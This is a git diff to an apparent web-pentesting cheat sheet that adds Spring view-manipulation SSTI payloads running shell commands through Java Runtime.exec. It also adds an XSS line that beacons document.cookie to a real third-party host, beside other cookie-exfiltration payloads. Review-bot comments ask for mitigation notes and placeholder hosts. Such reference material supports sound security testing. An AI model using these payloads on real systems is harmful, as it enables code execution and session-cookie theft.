GitBook: [master] 2 pages modified
parent 922db0f156
commit 85571317f2
@ -151,6 +151,13 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
|
||||
|
||||
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
|
||||
|
||||
### Spring View Manipulation \(Java\)
|
||||
|
||||
* `__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x`
|
||||
* `__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x`
|
||||
|
||||
[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
|
||||
|
||||
### Smarty \(PHP\)
|
||||
|
||||
#### More information
|
||||
|
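Review bot: The two payloads under `### Spring View Manipulation \(Java\)` are listed with no sentence saying which input they are placed in or what the `__${...}__::.x` wrapper relies on, so a reader cannot tell this case apart from the Thymeleaf entry just above it. Add a one-line description of the precondition and a short note on mitigation, so the entry is usable for code review and remediation as well as testing. The reference is also a bare link, while the acunetix reference above it is a `*` list item; make it a list item for consistency.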
@ -522,6 +522,7 @@ A XSS occurs.
|
||||
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
|
||||
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
|
||||
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
|
||||
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
|
||||
```
|
||||
|
||||
### Port Scanner \(fetch\)
|
||||
|
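Review bot: The `navigator.sendBeacon` line points at a concrete third-party host, `https://ssrftest.com/x/AAAAA`, while the neighbouring lines use placeholders (`<SERVER_IP>`, `YOUR-SUBDOMAIN-HERE`). Anyone who pastes it unchanged during a test sends session cookies to a server they do not control; replace the host with a placeholder such as `<SERVER_IP>` to match the rest of the block.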